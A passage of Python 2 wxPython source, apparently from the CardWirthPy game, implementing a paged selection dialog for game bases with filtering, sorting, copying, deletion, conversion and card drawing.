seq.append((wx.ACCEL_CTRL, ord('F'), addctrl))
def OnToggleAdditionalControls(self, event):
self.addctrlbtn.SetToggle(not self.addctrlbtn.GetToggle())
self._additional_controls()
def OnAdditionalControls(self, event):
self._additional_controls()
def _additional_controls(self):
cw.cwpy.play_sound("equipment")
self.update_additionals()
self.update_narrowcondition()
# On GTK, show/hide state changes may be applied late,
# so defer the re-layout and everything after it
def func():
self._do_layout()
self.toppanel.Refresh()
self.panel.Refresh()
self.Refresh()
cw.cwpy.frame.exec_func(func)
#-------------------------------------------------------------------------------
# Selection dialog with list view support (abstract class)
#-------------------------------------------------------------------------------
class MultiViewSelect(Select):
def __init__(self, parent, title, enterid, views=10, show_multi=False, lines=2):
# create the dialog box
Select.__init__(self, parent, title)
self.viewbtn = None
self._processing = False
self._views = views
self._lines = lines
self._enterid = enterid
self.views = views if show_multi else 1
def can_clickside(self):
return self.views <= 1
def OnLeftDClick(self, event):
# in list view, a double-click confirms the selection
if self._processing:
return
if 1 < self.views and self.list and self.can_clickcenter() and self.clickmode == 0:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self._enterid)
self.ProcessEvent(btnevent)
elif self.can_clickside() and self.clickmode == wx.LEFT:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.leftbtn.GetId())
self.ProcessEvent(btnevent)
elif self.can_clickside() and self.clickmode == wx.RIGHT:
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.rightbtn.GetId())
self.ProcessEvent(btnevent)
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if not self.list or len(self.list) == 1:
return
count = self.views
if len(self.list) <= self.views:
count = 1
if cw.util.get_wheelrotation(event) > 0:
self.index = cw.util.number_normalization(self.index - count, 0, len(self.list))
else:
self.index = cw.util.number_normalization(self.index + count, 0, len(self.list))
else:
if cw.util.get_wheelrotation(event) > 0:
self.index = cw.util.number_normalization(self.index - count, 0, self.get_pagecount() * self.views)
else:
self.index = cw.util.number_normalization(self.index + count, 0, self.get_pagecount() * self.views)
if len(self.list) <= self.index:
self.index = len(self.list) - 1
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickLeftBtn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() != self.leftbtn or len(self.list) <= self.views:
Select.OnClickLeftBtn(self, evt)
return
self.index = cw.util.number_normalization(self.index - self.views, 0, self.get_pagecount() * self.views)
if len(self.list) <= self.index:
self.index = len(self.list) - 1
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickLeft2Btn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() != self.left2btn or len(self.list) <= self.views:
Select.OnClickLeft2Btn(self, evt)
return
if self.get_page() == 0:
self.index = len(self.list) - 1
elif self.index - self.views * self._views < 0:
self.index = 0
else:
self.index = self.index - self.views * self._views
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickRightBtn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() != self.rightbtn or len(self.list) <= self.views:
Select.OnClickRightBtn(self, evt)
return
self.index = cw.util.number_normalization(self.index + self.views, 0, self.get_pagecount() * self.views)
if len(self.list) <= self.index:
self.index = len(self.list) - 1
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnClickRight2Btn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() != self.right2btn or len(self.list) <= self.views:
Select.OnClickRight2Btn(self, evt)
return
if self.get_page() == self.get_pagecount()-1:
self.index = 0
elif len(self.list) <= self.index + self.views * self._views:
self.index = len(self.list) - 1
else:
self.index = self.index + self.views * self._views
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnSelect(self, event):
if self._processing:
return
if not self.list:
return
if self.views == 1:
# when only one item is shown, confirm the selection
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self._enterid)
self.ProcessEvent(btnevent)
else:
# when multiple items are shown, select the one under the mouse pointer
mousepos = self.toppanel.ScreenToClient(wx.GetMousePosition())
size = self.toppanel.GetSize()
rw = size[0] // (self.views // self._lines)
rh = size[1] // self._lines
sindex = (mousepos[0] // rw) + ((mousepos[1] // rh) * (self.views // self._lines))
page = self.get_page()
index = page * self.views + sindex
index = min(index, len(self.list)-1)
if self.index != index:
self.index = index
cw.cwpy.play_sound("click")
self.index_changed()
self.enable_btn()
self.draw(True)
def OnClickViewBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("equipment")
self.change_view()
self.draw(True)
self.enable_btn()
def change_view(self):
if self.views == 1:
self.views = self._views
self.viewbtn.SetLabel(cw.cwpy.msgs["member_one"])
self.save_views(True)
else:
self.views = 1
self.viewbtn.SetLabel(cw.cwpy.msgs["member_list"])
self.save_views(False)
def enable_btn(self):
pass
def get_page(self):
return self.index / self.views
def get_pagecount(self):
return (len(self.list) + self.views - 1) / self.views
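# Worked example of the paging arithmetic (illustrative numbers): with 23 items
# and views == 6, get_pagecount() == (23 + 6 - 1) / 6 == 4 pages, and index 13
# falls on page 13 / 6 == 2 under Python 2 integer division.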
def save_views(self, multi):
pass
#-------------------------------------------------------------------------------
# Base (Yado) selection dialog
#-------------------------------------------------------------------------------
_okid = wx.NewId()
class YadoSelect(MultiViewSelect):
"""
宿選択ダイアログ。
"""
def __init__(self, parent):
# create the dialog box
MultiViewSelect.__init__(self, parent, cw.cwpy.msgs["select_base_title"], _okid, 6,
cw.cwpy.setting.show_multiplebases, lines=3)
self._lastbillskindir = None
self._bg = None
# base (Yado) information
self._names, self._list, self._list2, self._skins, self._classic, self._isshortcuts, self._imgpaths = self.get_yadolist()
self.index = 0
for index, path in enumerate(self._list):
if cw.cwpy.setting.lastyado == os.path.basename(path):
self.index = index
break
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((400, 370)))
# narrowing filter
choices = (cw.cwpy.msgs["all"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["member_name"],
cw.cwpy.msgs["skin"])
self._init_narrowpanel(choices, u"", cw.cwpy.setting.yado_narrowtype)
# sort
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
self.sort_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["sort_title"])
self.sort_label.SetFont(font)
choices = (cw.cwpy.msgs["sort_no"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["skin"])
self.sort = wx.Choice(self, size=(-1, cw.wins(20)), choices=choices)
self.sort.SetFont(cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(14)))
if cw.cwpy.setting.sort_yado == "Name":
self.sort.Select(1)
elif cw.cwpy.setting.sort_yado == "Skin":
self.sort.Select(2)
else:
self.sort.Select(0)
# ok
self.okbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, _okid, cw.wins((50, 23)), cw.cwpy.msgs["decide"])
self.buttonlist.append(self.okbtn)
# new
self.newbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["new"])
self.buttonlist.append(self.newbtn)
# extension
self.exbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["extension"])
self.buttonlist.append(self.exbtn)
# view
s = cw.cwpy.msgs["member_list"] if self.views == 1 else cw.cwpy.msgs["member_one"]
self.viewbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), s)
self.buttonlist.append(self.viewbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((50, 23)), cw.cwpy.msgs["entry_cancel"])
self.buttonlist.append(self.closebtn)
        # enable button
self.enable_btn()
        # Enable drag-and-drop of files
self.DragAcceptFiles(True)
# additionals
self.create_addctrlbtn(self.toppanel, self._get_bg(), cw.cwpy.setting.show_additional_yado)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(self.addctrlbtn, 0, wx.ALIGN_TOP, 0)
self.toppanel.SetSizer(sizer)
self.additionals.append(self.narrow_label)
self.additionals.append(self.narrow)
self.additionals.append(self.narrow_type)
self.additionals.append(self.sort_label)
self.additionals.append(self.sort)
self.update_additionals()
self.list = self._list
self.update_narrowcondition()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnOk, id=self.okbtn.GetId())
self.Bind(wx.EVT_BUTTON, self.OnClickNewBtn, self.newbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickViewBtn, self.viewbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickExBtn, self.exbtn)
self.Bind(wx.EVT_CHOICE, self.OnSort, self.sort)
self.Bind(wx.EVT_DROP_FILES, self.OnDropFiles)
self.toppanel.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
seq = self.accels
newcreateid = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnClickNewBtn, id=newcreateid)
seq.append((wx.ACCEL_CTRL, ord('N'), newcreateid))
self.sortkeydown = []
for i in xrange(0, 9):
sortkeydown = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnNumberKeyDown, id=sortkeydown)
seq.append((wx.ACCEL_CTRL, ord('1')+i, sortkeydown))
self.sortkeydown.append(sortkeydown)
self.append_addctrlaccelerator(seq)
cw.util.set_acceleratortable(self, seq)
def update_additionals(self):
Select.update_additionals(self)
cw.cwpy.setting.show_additional_yado = self.addctrlbtn.GetToggle()
def _add_topsizer(self):
nsizer = wx.BoxSizer(wx.HORIZONTAL)
nsizer.Add(self.narrow_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(2))
nsizer.Add(self.narrow, 1, wx.CENTER, 0)
nsizer.Add(self.narrow_type, 0, wx.CENTER|wx.EXPAND, cw.wins(3))
nsizer.Add(self.sort_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(3))
nsizer.Add(self.sort, 0, wx.CENTER|wx.EXPAND, 0)
self.topsizer.Add(nsizer, 0, wx.EXPAND, 0)
def _on_narrowcondition(self):
cw.cwpy.setting.yado_narrowtype = self.narrow_type.GetSelection()
self.update_narrowcondition()
self.draw(True)
def update_narrowcondition(self):
        if 0 <= self.index < len(self.list):
selected = self.list[self.index]
else:
selected = None
objs = self._list_to_obj()
narrow = self.narrow.GetValue().lower()
donarrow = self.narrow.IsShown() and bool(narrow)
if donarrow:
_NARROW_ALL = 0
_NARROW_NAME = 1
_NARROW_MEMBER = 2
_NARROW_SKIN = 3
ntype = self.narrow_type.GetSelection()
ntypes = set()
if ntype == _NARROW_ALL:
ntypes.add(_NARROW_NAME)
ntypes.add(_NARROW_MEMBER)
ntypes.add(_NARROW_SKIN)
else:
ntypes.add(ntype)
seq = []
for obj in objs:
def has_advname():
for advname in obj.advnames:
if narrow in advname.lower():
return True
return False
if (_NARROW_NAME in ntypes and narrow in obj.name.lower()) or \
(_NARROW_MEMBER in ntypes and has_advname()) or \
(_NARROW_SKIN in ntypes and narrow in obj.skin.lower()):
seq.append(obj)
objs = seq
self._sort_objs(objs)
self._obj_to_list(objs)
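        # Restore the previous selection when it survived the filter.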
if selected in self.list:
self.index = self.list.index(selected)
elif self.list:
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
def _get_bg(self):
if self._bg:
return self._bg
path = "Table/Bill"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
self._bg = cw.util.load_wxbmp(path, can_loaded_scaledimage=True)
return self._bg
def OnKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_DELETE and self.list:
return self.delete_yado()
def OnNumberKeyDown(self, event):
"""
        Handle presses of the number keys '1' through '9'.
        In PlayerSelect this changes the sort condition.
"""
if self._processing:
return
if self.sort.IsShown():
index = self.sortkeydown.index(event.GetId())
if index < self.sort.GetCount():
self.sort.SetSelection(index)
event = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, self.sort.GetId())
self.ProcessEvent(event)
def OnSort(self, event):
if self._processing:
return
index = self.sort.GetSelection()
if index == 1:
sorttype = "Name"
elif index == 2:
sorttype = "Skin"
else:
sorttype = "None"
if cw.cwpy.setting.sort_yado <> sorttype:
cw.cwpy.play_sound("page")
cw.cwpy.setting.sort_yado = sorttype
self.update_narrowcondition()
self.draw(True)
def _sort_objs(self, objs):
sorttype = cw.cwpy.setting.sort_yado
if sorttype == "Name":
cw.util.sort_by_attr(objs, "name", "skin", "order", "yadodir")
elif sorttype == "Skin":
cw.util.sort_by_attr(objs, "skin", "name", "order", "yadodir")
else:
cw.util.sort_by_attr(objs, "order", "name", "skin", "yadodir")
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if change_combo(self.narrow_type, event):
return
elif change_combo(self.sort, event):
return
else:
MultiViewSelect.OnMouseWheel(self, event)
def _list_to_obj(self):
class YadoObj(object):
def __init__(self, name, yadodir, advnames, skin, classic, isshortcut, imgpaths):
self.name = name
self.yadodir = yadodir
self.advnames = advnames
self.skin = skin
self.classic = classic
self.isshortcut = isshortcut
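                # Bases without a recorded order default to a large value
                # so that they sort to the end of the list.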
if isshortcut:
self.order = cw.cwpy.setting.yado_order.get(os.path.basename(isshortcut), 0x7fffffff)
else:
self.order = cw.cwpy.setting.yado_order.get(os.path.basename(yadodir), 0x7fffffff)
self.imgpaths = imgpaths
seq = []
for t in zip(self._names, self._list, self._list2, self._skins, self._classic, self._isshortcuts, self._imgpaths):
seq.append(YadoObj(*t))
return seq
def _obj_to_list(self, objs):
self.names = []
self.list = []
self.list2 = []
self.skins = []
self.classic = []
self.isshortcuts = []
self.imgpaths = []
for obj in objs:
self.names.append(obj.name)
self.list.append(obj.yadodir)
self.list2.append(obj.advnames)
self.skins.append(obj.skin)
self.classic.append(obj.classic)
self.isshortcuts.append(obj.isshortcut)
self.imgpaths.append(obj.imgpaths)
def save_views(self, multi):
cw.cwpy.setting.show_multiplebases = multi
def index_changed(self):
MultiViewSelect.index_changed(self)
self.enable_btn()
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
buttonlist[0].SetFocus()
def can_clickcenter(self):
return not (self.views == 1 and self._list and not self.okbtn.IsEnabled()) and \
((self.list and self._list and os.path.isdir(self.list[self.index])) or \
(self.newbtn.IsEnabled() and not self._list))
def enable_btn(self):
        # Disable the buttons when the list is empty
if not self.list:
self.okbtn.SetLabel(cw.cwpy.msgs["decide"])
self._disable_btn((self.exbtn, self.newbtn, self.closebtn))
return
if self.classic[self.index]:
self.okbtn.SetLabel(u"変換")
else:
self.okbtn.SetLabel(cw.cwpy.msgs["decide"])
if len(self.list) <= 1:
self._enable_btn((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
else:
self._enable_btn()
if self.list and (cw.util.exists_mutex(self.list[self.index]) or not os.path.isdir(self.list[self.index])):
self.okbtn.Disable()
def OnSelect(self, event):
if self._list:
MultiViewSelect.OnSelect(self, event)
elif self.newbtn.IsEnabled():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.newbtn.GetId())
self.ProcessEvent(btnevent)
def OnOk(self, event):
if not self.list:
return
if not self.okbtn.IsEnabled():
return
if self.classic[self.index]:
self._convert_current()
else:
self.EndModal(wx.ID_OK)
def OnDropFiles(self, event):
paths = event.GetFiles()
for path in paths:
self.conv_yado(path)
time.sleep(0.3)
def OnClickExBtn(self, event):
"""
        Extension menu.
"""
cw.cwpy.play_sound("click")
if self.list:
yname = self.names[self.index]
title = cw.cwpy.msgs["extension_title"] % (yname)
classic = self.classic[self.index]
hasmutexlocal = not cw.util.exists_mutex(self.list[self.index]) and os.path.isdir(self.list[self.index])
cantransfer = bool(1 < self.classic.count(False) and os.path.isdir(self.list[self.index]))
else:
title = cw.cwpy.msgs["extension_title_2"]
classic = False
hasmutexlocal = False
cantransfer = False
if cantransfer:
for i, path in enumerate(self.list):
if not self.classic[i] and cw.util.exists_mutex(path):
cantransfer = False
break
items = [
(cw.cwpy.msgs["settings"], cw.cwpy.msgs["edit_base_description"], self.rename_yado, not classic and hasmutexlocal),
(cw.cwpy.msgs["copy"], cw.cwpy.msgs["copy_base_description"], self.copy_yado, not classic and hasmutexlocal),
(cw.cwpy.msgs["transfer"], cw.cwpy.msgs["transfer_base_description"], self.trasnfer_yadodata, cantransfer),
(u"変換", u"CardWirth用の宿データをCardWirthPy用の拠点データに変換します。", self._conv_yado, not cw.util.exists_mutex(cw.tempdir_init)),
(u"逆変換", u"選択中の拠点データをCardWirth用のデータに逆変換します。", self.unconv_yado, not classic and hasmutexlocal),
(cw.cwpy.msgs["delete"], cw.cwpy.msgs["delete_base_description"], self.delete_yado, hasmutexlocal),
]
dlg = cw.dialog.etc.ExtensionDialog(self, title, items)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def rename_yado(self):
"""
        Rename a base.
"""
if not os.path.isdir(self.list[self.index]):
return
cw.cwpy.play_sound("click")
path = self.list[self.index]
dlg = cw.dialog.create.YadoCreater(self, path)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
self.update_list(dlg.yadodir, clear_narrowcondition=True)
dlg.Destroy()
def copy_yado(self):
"""
        Duplicate a base.
"""
if not os.path.isdir(self.list[self.index]):
return
cw.cwpy.play_sound("signal")
path = self.list[self.index]
yname = self.names[self.index]
s = cw.cwpy.msgs["copy_base"] % (yname)
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
if cw.util.create_mutex(u"Yado"):
try:
if cw.util.create_mutex(self.list[self.index]):
cw.util.release_mutex()
env = cw.util.join_paths(path, "Environment.xml")
data = cw.data.xml2etree(env)
name = data.gettext("Property/Name", os.path.basename(path))
name = u"コピー - %s" % (name)
                        if data.find("Property/Name") is not None:
data.edit("Property/Name", name)
else:
e = data.make_element("Name", name)
data.insert("Property", e, 0)
newpath = cw.binary.util.check_filename(name)
newpath = cw.util.join_paths(os.path.dirname(path), newpath)
newpath = cw.binary.util.check_duplicate(newpath)
shutil.copytree(path, newpath)
env = cw.util.join_paths(newpath, "Environment.xml")
data.write(env)
cw.cwpy.play_sound("harvest")
cw.cwpy.setting.insert_yadoorder(os.path.basename(newpath))
self.update_list(newpath)
else:
cw.cwpy.play_sound("error")
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
dlg.Destroy()
    def transfer_yadodata(self):
"""
        Copy data between bases.
"""
if not os.path.isdir(self.list[self.index]):
return
if cw.util.create_mutex(u"Yado"):
try:
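                # Probe every base by briefly taking its mutex; the transfer
                # is aborted if any base is currently open elsewhere.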
mutexes = 0
for path in self.list:
if cw.util.create_mutex(path):
mutexes += 1
else:
break
draw = False
try:
if mutexes <> len(self.list):
cw.cwpy.play_sound("error")
return
finally:
for i in xrange(mutexes):
cw.util.release_mutex()
path = self.list[self.index]
dirs = []
names = []
for i, dname in enumerate(self.list):
if not self.classic[i]:
dirs.append(dname)
names.append(self.names[i])
if names:
cw.cwpy.play_sound("click")
dlg = cw.dialog.transfer.TransferYadoDataDialog(self, dirs, names, path)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
self.update_list(path)
dlg.Destroy()
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
def delete_yado(self):
"""
        Delete a base.
"""
if not os.path.isdir(self.list[self.index]):
return
if cw.util.create_mutex(u"Yado"):
try:
if cw.util.create_mutex(self.list[self.index]):
cw.util.release_mutex()
cw.cwpy.play_sound("signal")
path = self.list[self.index]
dname = os.path.basename(path)
if self.isshortcuts[self.index]:
yname = u"%sへのショートカット" % (self.names[self.index])
else:
yname = self.names[self.index]
s = cw.cwpy.msgs["delete_base"] % (yname)
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
if self.isshortcuts[self.index]:
cw.util.remove(self.isshortcuts[self.index])
else:
cw.util.remove(path, trashbox=True)
if not self.classic[self.index]:
cw.util.remove(cw.util.join_paths(u"Data/Temp/Local", path))
cw.cwpy.play_sound("dump")
cw.cwpy.setting.yado_order.pop(dname, None)
if self.index+1 < len(self.list):
self.update_list(self.list[self.index+1])
elif 0 < self.index:
self.update_list(self.list[self.index-1])
else:
self.update_list()
dlg.Destroy()
else:
cw.cwpy.play_sound("error")
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
def OnClickNewBtn(self, event):
"""
        Create a new base.
"""
cw.cwpy.play_sound("click")
dlg = cw.dialog.create.YadoCreater(self)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("harvest")
cw.cwpy.setting.insert_yadoorder(os.path.basename(dlg.yadodir))
self.update_list(dlg.yadodir, clear_narrowcondition=True)
dlg.Destroy()
def _conv_yado(self):
"""
        Convert CardWirth base data.
"""
        # Directory selection dialog
s = (u"CardWirthの宿のデータをCardWirthPy用に変換します。" +
u"\n変換する宿のフォルダを選択してください。")
dlg = wx.DirDialog(self, s, style=wx.DD_DIR_MUST_EXIST)
dlg.SetPath(os.getcwdu())
if dlg.ShowModal() == wx.ID_OK:
path = dlg.GetPath()
dlg.Destroy()
self.conv_yado(path)
else:
dlg.Destroy()
def _convert_current(self):
if not (self.list and self.classic[self.index]):
return
yname = self.names[self.index]
s = u"%sをCardWirthPy用に変換します。\nよろしいですか?" % yname
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
self.Parent.move_dlg(dlg)
cw.cwpy.play_sound("click")
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
path = self.list[self.index]
self.conv_yado(path, ok=True, moveconverted=True, deletepath=self.isshortcuts[self.index])
else:
dlg.Destroy()
def draw(self, update=False):
dc = Select.draw(self, update)
        if self.views <> 1 and self._lastbillskindir is not None:
skindir = self._lastbillskindir
elif self.list and self.views == 1:
skindir = self.skins[self.index]
self._lastbillskindir = skindir
else:
skindir = cw.cwpy.skindir
        # Background
path = "Table/Bill"
path = cw.util.find_resource(cw.util.join_paths(skindir, path), cw.cwpy.rsrc.ext_img)
bmp = cw.wins(cw.util.load_wxbmp(path, can_loaded_scaledimage=True))
bmpw, bmph = bmp.GetSize()
dc.DrawBitmap(bmp, 0, 0, False)
        # Nothing more to draw when the list is empty
if not self.list:
return
def get_playingbmp():
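            # Resolve the "in use" marker: prefer the skin's PLAYING_YADO
            # image, then PLAYING, then the built-in dialog resources.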
fpath = cw.util.find_resource(cw.util.join_paths(skindir, "Resource/Image/Dialog/PLAYING_YADO"), cw.M_IMG)
if os.path.isfile(fpath):
return cw.wins((cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=True),
cw.setting.SIZE_RESOURCES["Dialog/PLAYING_YADO"]))
else:
fpath = cw.util.find_resource(cw.util.join_paths(skindir, "Resource/Image/Dialog/PLAYING"), cw.M_IMG)
if os.path.isfile(fpath):
return cw.wins((cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=True),
cw.setting.SIZE_RESOURCES["Dialog/PLAYING"]))
elif "PLAYING_YADO" in cw.cwpy.rsrc.dialogs:
return cw.cwpy.rsrc.dialogs["PLAYING_YADO"]
else:
return cw.cwpy.rsrc.dialogs["PLAYING"]
cardw, cardh = cw.wins(cw.SIZE_CARDIMAGE)
if self.views == 1:
            # Single view
if self.classic[self.index]:
                # Conversion required
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgmsg", pixelsize=cw.wins(16)))
dc.SetTextForeground(wx.RED)
s = u"変換が必要です"
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(20))
            # Base image
imgx = (bmpw-cardw) // 2
imgy = cw.wins(70)
imgpaths = self.imgpaths[self.index]
if imgpaths:
#dc.SetClippingRegion(wx.Rect(imgx, imgy, cardw, cardh))
dc.SetClippingRect(wx.Rect(imgx, imgy, cardw, cardh))
for info in imgpaths:
if not info.path:
continue
path = cw.util.join_paths(self.list[self.index], info.path)
bmp_noscale = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True)
bmp = cw.wins(bmp_noscale)
baserect = info.calc_basecardposition_wx(bmp.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
dc.DrawBitmap(bmp, imgx + baserect.x, imgy + baserect.y, True)
dc.DestroyClippingRegion()
else:
path = "Resource/Image/Card/COMMAND0"
path = cw.util.find_resource(cw.util.join_paths(skindir, path), cw.cwpy.rsrc.ext_img)
bmp = cw.wins(cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True))
dc.DrawBitmap(bmp, (bmpw-cw.wins(74))/2, cw.wins(65), True)
if self.isshortcuts[self.index]:
bmp = cw.cwpy.rsrc.dialogs["LINK"]
dc.DrawBitmap(bmp, imgx, imgy, True)
            # Base name
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("scenario", pixelsize=cw.wins(21)))
s = self.names[self.index]
w = dc.GetTextExtent(s)[0]
            # Clamp the name to the card width
maxwidth = bmpw - cw.wins(5)*2
if maxwidth < w:
cw.util.draw_witharound(dc, s, cw.wins(5), cw.wins(36), maxwidth=maxwidth)
else:
cw.util.draw_witharound(dc, s, (bmpw-w)/2, cw.wins(36))
            # Page number
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
            s = str(self.index+1)
s = s + " / " + str(len(self.list))
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, (bmpw-w)/2, cw.wins(340))
# Adventurers
s = cw.cwpy.msgs["adventurers"]
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(170))
            # Adventurers registered at the base
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
for idx, name in enumerate(self.list2[self.index]):
if 24 <= idx:
break
if 23 == idx:
if 24 < len(self.list2[self.index]):
name = cw.cwpy.msgs["scenario_etc"]
name = cw.util.abbr_longstr(dc, name, cw.wins(90))
x = (bmpw - cw.wins(270)) / 2 + ((idx % 3) * cw.wins(95))
y = cw.wins(195) + (idx / 3) * cw.wins(16)
dc.DrawText(name, x, y)
            # "In use" marker
if cw.util.exists_mutex(self.list[self.index]):
bmp = get_playingbmp()
w, h = bmp.GetSize()
dc.DrawBitmap(bmp, (bmpw-w)//2, (bmph-h)//2, True)
else:
            # List view
pindex = self.views * self.get_page()
x = 0
y = 0
aw = bmpw // 2
ah = bmph // 3
for index in xrange(pindex, min(pindex+self.views, len(self.list))):
skindir = self.skins[index]
                # Base image
imgpaths = self.imgpaths[index]
imgx = cw.wins(5)+x
imgy = cw.wins(20)+y
if imgpaths:
#dc.SetClippingRegion(wx.Rect(imgx, imgy, cardw, cardh))
dc.SetClippingRect(wx.Rect(imgx, imgy, cardw, cardh))
for info in imgpaths:
if not info.path:
continue
path = cw.util.join_paths(self.list[index], info.path)
bmp_noscale = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True)
bmp = cw.wins(bmp_noscale)
baserect = info.calc_basecardposition_wx(bmp.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
dc.DrawBitmap(bmp, imgx + baserect.x, imgy + baserect.y, True)
dc.DestroyClippingRegion()
else:
path = "Resource/Image/Card/COMMAND0"
path = cw.util.find_resource(cw.util.join_paths(skindir, path), cw.cwpy.rsrc.ext_img)
bmp = cw.wins(cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True))
dc.DrawBitmap(bmp, imgx, imgy, True)
if self.isshortcuts[index]:
bmp = cw.cwpy.rsrc.dialogs["LINK"]
dc.DrawBitmap(bmp, cw.wins(2)+x, cw.wins(85)+y, True)
                # Base name
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("scenario", pixelsize=cw.wins(17)))
s = self.names[index]
                s = cw.util.abbr_longstr(dc, s, aw-2)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, (aw-w)//2+x, cw.wins(3)+y)
yy = cw.wins(25)
amax = 6
if self.classic[index]:
                    # Conversion required
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgmsg", pixelsize=cw.wins(14)))
dc.SetTextForeground(wx.RED)
s = u"変換が必要です"
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(84)+x, cw.wins(22)+y)
yy += cw.wins(15)
amax -= 1
                # Adventurers registered at the base
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
for idx, name in enumerate(self.list2[index]):
name = cw.util.abbr_longstr(dc, name, aw-cw.wins(84)-cw.wins(2))
cw.util.draw_witharound(dc, name, cw.wins(84)+x, yy+y)
yy += cw.wins(15)
if amax-2 <= idx and amax < len(self.list2[index]):
name = cw.cwpy.msgs["scenario_etc"]
cw.util.draw_witharound(dc, name, cw.wins(84)+x, yy+y)
break
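                # Advance the drawing position: two entries per row.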
if (index-pindex) % 2 == 1:
x = 0
y += ah
else:
x += aw
            # Page number
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(13)))
s = u"%s/%s" % (self.get_page()+1, self.get_pagecount())
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, (bmpw-w)/2, cw.wins(355))
            # "In use" marker
x = 0
y = 0
for index in xrange(pindex, min(pindex+self.views, len(self.list))):
skindir = self.skins[index]
if cw.util.exists_mutex(self.list[index]):
